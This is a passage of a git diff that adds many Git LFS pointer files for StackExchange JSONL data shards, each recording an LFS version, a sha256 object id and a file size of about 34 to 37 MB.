0000000000000000000000000000000000000000..2ae75ae999eda35c67cdf64e9f1d7ce97af2f75d --- /dev/null +++ b/data/stackexchange/1-1/1497_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:47c5c7a46da1ce09676e67787600ec048fbb62b02683e9bb0d3a0ac669bfd947 +size 34525434 diff --git a/data/stackexchange/1-1/1498_2289.jsonl b/data/stackexchange/1-1/1498_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..779572400f01d63c47c7fba2b06f73573d853272 --- /dev/null +++ b/data/stackexchange/1-1/1498_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b266ed63349aedf3149e7a8077528779a086dec270779061d792aebbbd0efb74 +size 34565831 diff --git a/data/stackexchange/1-1/1499_2289.jsonl b/data/stackexchange/1-1/1499_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eb7c9e420500e9dfc99fb94cf1df833a50880d9e --- /dev/null +++ b/data/stackexchange/1-1/1499_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b97b93f3b7674cf90cd3f559c8fee7ff5bbbe8f3a37747893b36ecfa7d90e82 +size 34272725 diff --git a/data/stackexchange/1-1/149_2289.jsonl b/data/stackexchange/1-1/149_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..850e8aa41612182cc159a016e01d92accced91f6 --- /dev/null +++ b/data/stackexchange/1-1/149_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:08e5b5aae312871616341fb1cdee084d423c900652d5da93e123892c6fdabaa7 +size 33715696 diff --git a/data/stackexchange/1-1/14_2289.jsonl b/data/stackexchange/1-1/14_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6271250216056b7768d4fce001f21e991fef0e1b --- /dev/null +++ b/data/stackexchange/1-1/14_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a666d5a0a9c1191b9541dc4df814b9abec5285e90dbf618639e003d943d0e313 +size 35950488 diff --git a/data/stackexchange/1-1/1500_2289.jsonl b/data/stackexchange/1-1/1500_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5fa46e04e80f90842de8a15706af7e351b14dc18 --- /dev/null +++ b/data/stackexchange/1-1/1500_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c3c8f5661ba5fa5f142107d7e82066cd3868601a78316fff4bf1413839e8d27b +size 34093143 diff --git a/data/stackexchange/1-1/1501_2289.jsonl b/data/stackexchange/1-1/1501_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..768f37f6521bc4008256ce2c90e427a7028e3a48 --- /dev/null +++ b/data/stackexchange/1-1/1501_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e8a6db9c5a8a78389aba32a613c20a242fdb4a5b298e9d92c425f305edb2714e +size 34226688 diff --git a/data/stackexchange/1-1/1502_2289.jsonl b/data/stackexchange/1-1/1502_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eb4d5f895315daa242ebfef4e83919f9ba0e323c --- /dev/null +++ b/data/stackexchange/1-1/1502_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6a7efd3ae98881123590c4d87b9b1b227d12d9bedaa70da065b0fb79ad634b14 +size 34758661 diff --git a/data/stackexchange/1-1/1503_2289.jsonl b/data/stackexchange/1-1/1503_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..36d66cfba71a84770d228656f4914e08ccd72aff --- /dev/null +++ b/data/stackexchange/1-1/1503_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a864c1854a028889360d88f1f53b29e60cbbdf5fa63303abf01520e96dfcadc1 +size 34691912 diff --git a/data/stackexchange/1-1/1504_2289.jsonl b/data/stackexchange/1-1/1504_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..56090c910546335ea940f1facac24bb7ba457f52 --- /dev/null +++ b/data/stackexchange/1-1/1504_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:3114b633b5396cabdbd7f6ba47b31abe9db2c5897e70b3fe18c4f86b11bb8a54 +size 34529768 diff --git a/data/stackexchange/1-1/1505_2289.jsonl b/data/stackexchange/1-1/1505_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0caea871e0c7f5739c36daeee17190e7ac4f54f7 --- /dev/null +++ b/data/stackexchange/1-1/1505_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1cb24348f1d4ead4d63283b543a2522e9235c56b4126e3df8e63c79404dd3685 +size 34492017 diff --git a/data/stackexchange/1-1/1506_2289.jsonl b/data/stackexchange/1-1/1506_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae024a65662510feb538457364c9194535d690f8 --- /dev/null +++ b/data/stackexchange/1-1/1506_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:180b645f215e06c27af58113fafee1502dd64732ef2c97ac30517bbee6ab239f +size 35063256 diff --git a/data/stackexchange/1-1/1507_2289.jsonl b/data/stackexchange/1-1/1507_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8a8407d36b26fe1580f01ea7428d0764833e44d4 --- /dev/null +++ b/data/stackexchange/1-1/1507_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:467af76f5e516e5f82efd2be4d416a2830ad2451f51d74095d650bd9a6444814 +size 34218594 diff --git a/data/stackexchange/1-1/1508_2289.jsonl b/data/stackexchange/1-1/1508_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4b02c4b1fe0874737ad8b84a0ec28998a984c42b --- /dev/null +++ b/data/stackexchange/1-1/1508_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2c77e987670610ca8c8622156fef768a83a98e665758db565303229646ba946c +size 34748624 diff --git a/data/stackexchange/1-1/1509_2289.jsonl b/data/stackexchange/1-1/1509_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3f7762ebc98160ffe12e62e23f8a8c1f00a1506a --- /dev/null +++ b/data/stackexchange/1-1/1509_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:10502ac8c3640cecb1d0f7985ed3dc2ead328db43c004c5599c92f5ffc3c9f9d +size 34453470 diff --git a/data/stackexchange/1-1/150_2289.jsonl b/data/stackexchange/1-1/150_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5f6cbbf9425084df4d7895c1fe199dd73fbcfb0f --- /dev/null +++ b/data/stackexchange/1-1/150_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0a6d38d7a6dac539039324730b2748c049763d0315c41ba964dcf5d3fbe7e0c0 +size 35127365 diff --git a/data/stackexchange/1-1/1510_2289.jsonl b/data/stackexchange/1-1/1510_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e7b68cdc0031e183534479f0aaf35ebb3d83c8b4 --- /dev/null +++ b/data/stackexchange/1-1/1510_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a63031b1f678c588a454b0fb56aaacce6ff74b83fd941b0f21ce8672e829f103 +size 34500778 diff --git a/data/stackexchange/1-1/1511_2289.jsonl b/data/stackexchange/1-1/1511_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cfa10f569e81e4db8cc8df3c60819889c2ed3ac2 --- /dev/null +++ b/data/stackexchange/1-1/1511_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:91bf449850289c78a9140ba2a10a505c172843ae0d3ae84a1a0c625c6c6b7a0d +size 33958093 diff --git a/data/stackexchange/1-1/1512_2289.jsonl b/data/stackexchange/1-1/1512_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..4de9492a741b53db69ad9711487d5d34ce6da7b9 --- /dev/null +++ b/data/stackexchange/1-1/1512_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bdfa5ac7172eadb7df9f09580bc1373b3d086ef9d2666abf0a88fb45514668e3 +size 34683852 diff --git a/data/stackexchange/1-1/1513_2289.jsonl b/data/stackexchange/1-1/1513_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5a8d47b9e86e7a1fc93101b1e8c6c28644e3db27 --- /dev/null +++ b/data/stackexchange/1-1/1513_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:32ff1383f2eda4f0f2fd863f73a6c64adf4588ffed6abcc777c7c640c2ecb0ee +size 34834677 diff --git a/data/stackexchange/1-1/1514_2289.jsonl b/data/stackexchange/1-1/1514_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..00567c6949ccd1f8844deecf3e68ceb183b7d146 --- /dev/null +++ b/data/stackexchange/1-1/1514_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0f6f1667c99844a267d06987e4d109c9a98bf9fc7f9b4780efbc4958fcae5cde +size 35061737 diff --git a/data/stackexchange/1-1/1515_2289.jsonl b/data/stackexchange/1-1/1515_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b1b5508fe6a6c6b8da551e292ca5c371db7778f --- /dev/null +++ b/data/stackexchange/1-1/1515_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:47f2ec52043635fb708b7a31f9373151f283bbe215d532c8d007c63b29eac322 +size 34124945 diff --git a/data/stackexchange/1-1/1516_2289.jsonl b/data/stackexchange/1-1/1516_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b8945de96158e00f4e00ca842a98b79b180f3e5 --- /dev/null +++ b/data/stackexchange/1-1/1516_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:455d3b7e3ecf6679d27556b60b270ada04c5b460862c291f3212d5d60f2e0bd2 +size 34640756 diff --git a/data/stackexchange/1-1/1517_2289.jsonl b/data/stackexchange/1-1/1517_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4a6cff47b04b457f7ff683833d99bb373e893f3a --- /dev/null +++ b/data/stackexchange/1-1/1517_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fa75a0353d1e252e8ab45f95548ea3c340a860abb43e2e1c0b7ecc69b27da963 +size 34733098 diff --git a/data/stackexchange/1-1/1518_2289.jsonl b/data/stackexchange/1-1/1518_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..34c9b9e386e38df291c7d57a0003ca9ac1b9fae5 --- /dev/null +++ b/data/stackexchange/1-1/1518_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c1afb7d54ba6c699ba7059b2cc05fbbcbcdb80cf542f38770c14cfc54682cb8 +size 34800201 diff --git a/data/stackexchange/1-1/1519_2289.jsonl b/data/stackexchange/1-1/1519_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3d88f0b383194733143ad0a41f7866650f3e378b --- /dev/null +++ b/data/stackexchange/1-1/1519_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:57ebf059ffcbf8dffe417521c625f309bddc227b43d6eefe2a36302728fd5bd2 +size 34649891 diff --git a/data/stackexchange/1-1/151_2289.jsonl b/data/stackexchange/1-1/151_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9dfa38f0681baa22428a6fdf5a573d0cd0fc2832 --- /dev/null +++ b/data/stackexchange/1-1/151_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:70a7651c7d2feb777033aee03a324dc31ae4495117f27ba739e05d24ee5c7370 +size 34819808 diff --git a/data/stackexchange/1-1/1520_2289.jsonl b/data/stackexchange/1-1/1520_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..27d4a7138465923644f6b61f570675829da6b1e5 --- /dev/null +++ b/data/stackexchange/1-1/1520_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:954df8d68efb8597a853f39f16393f1ebfa204128d31c2ad9995692de52dcb4b +size 34420024 diff --git a/data/stackexchange/1-1/1521_2289.jsonl b/data/stackexchange/1-1/1521_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8f8c227c25c6878acf528f8055cb47546b96408c --- /dev/null +++ b/data/stackexchange/1-1/1521_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6f62fdefc729b50a498e58a5f8c6f65f80d2b6321c81e7bb8160c7ad1ae6a0a +size 34568414 diff --git a/data/stackexchange/1-1/1522_2289.jsonl b/data/stackexchange/1-1/1522_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..81f9854b8fec75a8ce3231838a2caa48770c8d1d --- /dev/null +++ b/data/stackexchange/1-1/1522_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bbc83574bf8682a7107c875da9809383063c9eeaafc8640c656257d4db4a9935 +size 34754359 diff --git a/data/stackexchange/1-1/1523_2289.jsonl b/data/stackexchange/1-1/1523_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..235bd36b2d3ba7f6b20df2ee626d60f2b7a226e9 --- /dev/null +++ b/data/stackexchange/1-1/1523_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8477a9bb7e1ed8fb80daf7636f4eb83d5869b80bb962eb7b3cc7d8f912923ccb +size 34372530 diff --git a/data/stackexchange/1-1/1524_2289.jsonl b/data/stackexchange/1-1/1524_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9e8dd8d497ef608b7b5752bc10b239ee79a1fb63 --- /dev/null +++ b/data/stackexchange/1-1/1524_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a0f585b7d4b75b947b9d054b86e1bbae9404e794250519cc1adbf65814ff669d +size 34893660 diff --git a/data/stackexchange/1-1/1525_2289.jsonl b/data/stackexchange/1-1/1525_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..30cf7bf127ff5539404e38cf43d421b4f2432c5c --- /dev/null +++ b/data/stackexchange/1-1/1525_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:463fea7a7f7f189adb8b1e3cd82a146bb55d2c2f284c4f3db0e9fba19fa77921 +size 34421835 diff --git a/data/stackexchange/1-1/1526_2289.jsonl b/data/stackexchange/1-1/1526_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..50a19710b7733dcb5188ba7bde62c557006ce0b3 --- /dev/null +++ b/data/stackexchange/1-1/1526_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f77bbfe3de2bec4b0c1f2d2e6113efe0b821bbadffbe2fd343834eda49046ef8 +size 34427300 diff --git a/data/stackexchange/1-1/1527_2289.jsonl b/data/stackexchange/1-1/1527_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e143026cad232f879afe94a510c787a32a24a886 --- /dev/null +++ b/data/stackexchange/1-1/1527_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b144dbc0950c525e3d84211e51d2d340aaaa4a060cd558d81ffb4e1f2dccbcbf +size 34772796 diff --git a/data/stackexchange/1-1/1528_2289.jsonl b/data/stackexchange/1-1/1528_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..db1240493f279f138090368abd7597b8e8e3e36f --- /dev/null +++ b/data/stackexchange/1-1/1528_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d920596d9b2db80b9924b5a9bc602ab92f85763e107590a35ea6848c391308ed +size 34552681 diff --git a/data/stackexchange/1-1/1529_2289.jsonl b/data/stackexchange/1-1/1529_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cef519433a62613429a498e59741000a3127d4b2 --- /dev/null +++ b/data/stackexchange/1-1/1529_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aa284f991855c1d81e6d102de45a7784ae69f585ccda8e25c0f371856ce5a162 +size 34519515 diff --git a/data/stackexchange/1-1/152_2289.jsonl b/data/stackexchange/1-1/152_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ead7017baf83f43ce3c24f3cb29c43d597cd4f0a --- /dev/null +++ b/data/stackexchange/1-1/152_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:11c58e85beb2e56bd419aa27c28930fa8e8b711d9a167e0d7d868868a6d51eb4 +size 35361684 diff --git a/data/stackexchange/1-1/1530_2289.jsonl b/data/stackexchange/1-1/1530_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dbdbbf4b2b7d067f7e689a4c19608c34bee69d49 --- /dev/null +++ b/data/stackexchange/1-1/1530_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:97df2e3f151d96583a4404b662420c0d1e024c20d51920c3349adaf279c697c4 +size 34736988 diff --git a/data/stackexchange/1-1/1531_2289.jsonl b/data/stackexchange/1-1/1531_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a44bc301be7b5c6108a719666850bc497bd6605d --- /dev/null +++ b/data/stackexchange/1-1/1531_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2ed620e60507a2772b0b394fd026a7315c6f1b1271826b0eada6519758c0be26 +size 34433272 diff --git a/data/stackexchange/1-1/1532_2289.jsonl b/data/stackexchange/1-1/1532_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b9f0987aeeac1a389ced26466030622234186443 --- /dev/null +++ b/data/stackexchange/1-1/1532_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a21327322cb3c1f4411db924b15e34b100ead48020f0cc6bb832d1b49567de5 +size 34214899 diff --git a/data/stackexchange/1-1/1533_2289.jsonl b/data/stackexchange/1-1/1533_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ce8774bc374803f8a96b1f04cc1af6eb08c57345 --- /dev/null +++ b/data/stackexchange/1-1/1533_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41e2a51c528c812747b99aedc788eb97aa620b755f280a4222af58e597438621 +size 34928192 diff --git a/data/stackexchange/1-1/1534_2289.jsonl b/data/stackexchange/1-1/1534_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f16f55f2caa0c5fca2475d81ae6d71d5738d001a --- /dev/null +++ b/data/stackexchange/1-1/1534_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:30ee45d6f54bce35db6c6caa2b1f45f547e287580304582111e1fd6d037691e9 +size 34770694 diff --git a/data/stackexchange/1-1/1535_2289.jsonl b/data/stackexchange/1-1/1535_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3f8862db08e9904aa7fe1e2f6e1cfcaad6ae8424 --- /dev/null +++ b/data/stackexchange/1-1/1535_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:7fbac68c7ef945aa13302d7903412331531bb3357e3e7ea9e16b7d36f78edb93 +size 34422365 diff --git a/data/stackexchange/1-1/1536_2289.jsonl b/data/stackexchange/1-1/1536_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b0d355f9cb24a51bd766e631c450297b445856c2 --- /dev/null +++ b/data/stackexchange/1-1/1536_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4247944de936a78d1fa2084f573b95e57515f58aeea8caace4d3381029907384 +size 34573555 diff --git a/data/stackexchange/1-1/1537_2289.jsonl b/data/stackexchange/1-1/1537_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d465fc21e1a9cea764ad93443421fea0964b1742 --- /dev/null +++ b/data/stackexchange/1-1/1537_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f97f79e333e370f982c372b729398d2eff4f0b915363d5a4dc27340804a568d7 +size 34655619 diff --git a/data/stackexchange/1-1/1538_2289.jsonl b/data/stackexchange/1-1/1538_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5dd770c8d57521215f45a0083e473cceca195b0a --- /dev/null +++ b/data/stackexchange/1-1/1538_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:16a1d43e6edec29d34382e7c61cccf7668103bccae47531c4b2954f281c2aaeb +size 34630967 diff --git a/data/stackexchange/1-1/1539_2289.jsonl b/data/stackexchange/1-1/1539_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bf556f83c16b5b3c893468f75f0bbf2abaaa156d --- /dev/null +++ b/data/stackexchange/1-1/1539_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:50b4ca24c55d2fb710050c582b69aee28f3f310d16660e8bb5e9b9bacd710966 +size 36502943 diff --git a/data/stackexchange/1-1/153_2289.jsonl b/data/stackexchange/1-1/153_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..391e7637f279da0c63b1c93b25f1f3d2f5db8f3e --- /dev/null +++ b/data/stackexchange/1-1/153_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5494a2044146dfb672df67a993d5bd6559fb2579f6986a1e9c717d9770678e44 +size 35163898 diff --git a/data/stackexchange/1-1/1540_2289.jsonl b/data/stackexchange/1-1/1540_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eea59c5340ac732532ef2a21cc70311d720f1d91 --- /dev/null +++ b/data/stackexchange/1-1/1540_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a7590500af328049fb9900d72d9a4df944d07e8ec86332dbeef4ff1f830ce469 +size 37216618 diff --git a/data/stackexchange/1-1/1541_2289.jsonl b/data/stackexchange/1-1/1541_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9aa5b84884cbfc7bc89289fc73a9ce16a54f866c --- /dev/null +++ b/data/stackexchange/1-1/1541_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3109da4a70fc4736da825650fd5815db9c12df68d46d46309a05eb292970d68d +size 36561706 diff --git a/data/stackexchange/1-1/1542_2289.jsonl b/data/stackexchange/1-1/1542_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d9501def9ccc5f47e894e5df91600929efd29cca --- /dev/null +++ b/data/stackexchange/1-1/1542_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:be8e1466d8798e50542a4895a1c6d2dc3f41c0f12792cc2f24b474c313bf6697 +size 36256277 diff --git a/data/stackexchange/1-1/1543_2289.jsonl b/data/stackexchange/1-1/1543_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..19baa055399ef49d44315029c464227732493a3f --- /dev/null +++ b/data/stackexchange/1-1/1543_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0a4ae80646f81f27625c810e343b7676aa297144a2d3215cc646ee2c260fa5a8 +size 37282768 diff --git a/data/stackexchange/1-1/1544_2289.jsonl b/data/stackexchange/1-1/1544_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e5cbb8d67a1bb82a8bc6503ebe2bedba712261c8 --- /dev/null +++ b/data/stackexchange/1-1/1544_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d78ce9cafd291ebdabbd33075413bc4900baf5466e3f3448ad834a849c2a685d +size 37376603 diff --git a/data/stackexchange/1-1/1545_2289.jsonl b/data/stackexchange/1-1/1545_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..275bcaae6a2fadd0d5a8237162737900a8d7e32c --- /dev/null +++ b/data/stackexchange/1-1/1545_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:589a7341064b41c2aa2ccd2f3c2dfdac4162a3ceda75edda70872883e2dac944 +size 36870924 diff --git a/data/stackexchange/1-1/1546_2289.jsonl b/data/stackexchange/1-1/1546_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..66cfa969f0d9ff615d777b9e6cebab2fc6152b41 --- /dev/null +++ b/data/stackexchange/1-1/1546_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6a9e7fb831e732171d578540462f2467a6db2e19a6c147d21847add0688ff7c +size 37462651 diff --git a/data/stackexchange/1-1/1547_2289.jsonl b/data/stackexchange/1-1/1547_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..882e3d91c1fc10dc07f256200671df3e12b0f479 --- /dev/null +++ b/data/stackexchange/1-1/1547_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cf6105dfb321426c4712919aeed05ce2e3ebb8476000010bfc9dcc98d07f4146 +size 37207956 diff --git a/data/stackexchange/1-1/1548_2289.jsonl b/data/stackexchange/1-1/1548_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..393f65cd682e99c721d4fc3aae2b8117117ab2ed --- /dev/null +++ b/data/stackexchange/1-1/1548_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9711a6180edbb0478f42b74f24398507e59885681316197abba8db8c0b5cf627 +size 36959469 diff --git a/data/stackexchange/1-1/1549_2289.jsonl b/data/stackexchange/1-1/1549_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b56565fe339048a39183cd569688fc3d07edfefc --- /dev/null +++ b/data/stackexchange/1-1/1549_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c06f47685562b82bdcfd5cb97ef07c48802f047304a952430c9a7325a8f13116 +size 36681024 diff --git a/data/stackexchange/1-1/154_2289.jsonl b/data/stackexchange/1-1/154_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18933fd23bc3b5ccdb25c22fc77548817c172738 --- /dev/null +++ b/data/stackexchange/1-1/154_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80e7d424b2adf03ec8f024957ed14d63ab54b8630aa53a87c644bd3238eb300c +size 34905892 diff --git a/data/stackexchange/1-1/1550_2289.jsonl b/data/stackexchange/1-1/1550_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2d9a4eda67e4bae5cf23210fd1df7acd45959aa1 --- /dev/null +++ b/data/stackexchange/1-1/1550_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:7cdac2ab9da49886a24e35ff9f00f955a366abe39b900cb8adcbda9f911e2473 +size 37520351 diff --git a/data/stackexchange/1-1/1551_2289.jsonl b/data/stackexchange/1-1/1551_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..97a21090342ab3aa12618fa130686aeea8719398 --- /dev/null +++ b/data/stackexchange/1-1/1551_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7236ac42c64ffb996eb063fad49dfa7ae3d39c1990eb707f4ce98573c681e101 +size 37462991 diff --git a/data/stackexchange/1-1/1552_2289.jsonl b/data/stackexchange/1-1/1552_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ccff1db6a6c675d64ac808ffa8d058e85feba624 --- /dev/null +++ b/data/stackexchange/1-1/1552_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6218103207deb43a1d6056daaab0218e3dd0ff73de30a95199ef73ecb74fedeb +size 36909989 diff --git a/data/stackexchange/1-1/1553_2289.jsonl b/data/stackexchange/1-1/1553_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..28e38edadf96706563a24679e7e6490e5c67e540 --- /dev/null +++ b/data/stackexchange/1-1/1553_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a0da3932c452cb5f0199f910cde675588372bfdfedb3a2e6147fbffbe415d75 +size 37137984 diff --git a/data/stackexchange/1-1/1554_2289.jsonl b/data/stackexchange/1-1/1554_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..62e44a7ae4b23b56b883eb42b61b36c480a07d7e --- /dev/null +++ b/data/stackexchange/1-1/1554_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0f046d9df5c5f5609597941445007556bc2dacfbe1dbc30a2e08b468e39c0f92 +size 37053431 diff --git a/data/stackexchange/1-1/1555_2289.jsonl b/data/stackexchange/1-1/1555_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..747e82a77c4bee1b3ddcb0e2ead3d87441da50d2 --- /dev/null +++ b/data/stackexchange/1-1/1555_2289.jsonl 